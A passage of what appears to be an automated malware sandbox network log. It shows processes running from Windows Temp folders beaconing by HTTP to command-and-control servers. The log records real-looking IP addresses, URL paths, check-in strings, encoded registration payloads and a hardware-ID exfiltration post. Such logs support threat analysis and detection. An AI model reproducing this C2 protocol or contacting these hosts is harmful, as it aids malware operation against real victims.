23	192.168.2.5	61233	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:20.524712086 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:21.304316998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:21.327155113 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:21.582796097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	61235	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:21.164725065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:21.901549101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:21.903450012 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:22.151341915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	61237	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:21.869823933 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:22.629781961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:22.666374922 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:22.914958000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	61238	85.28.47.31	80	8448	C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:21.908835888 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:57:22.556220055 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:57:22.665791035 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAF Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build"sila------EBAEBFIIECBGCBGDHCAF--
Jul 26, 2024 17:57:22.849041939 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	61240	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:22.332628965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:23.087673903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:23.291508913 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:23.544565916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	61241	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:23.320177078 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:24.065395117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:24.178764105 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:24.428157091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	61250	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:23.678647041 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:24.435687065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:24.515588999 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:24.983622074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 17:57:24.997256041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	61251	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:24.605828047 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:25.403462887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:25.405394077 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:25.662237883 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	61260	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:25.333653927 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:26.044450998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:26.047583103 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:26.302413940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	61261	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:25.797723055 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:26.612140894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:26.685340881 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:26.936161995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	61262	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:26.696523905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:27.461931944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:27.484190941 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:27.734924078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	61263	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:27.157037973 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:27.890928984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:27.992193937 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:28.244071007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	61264	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:27.957607985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:28.679431915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
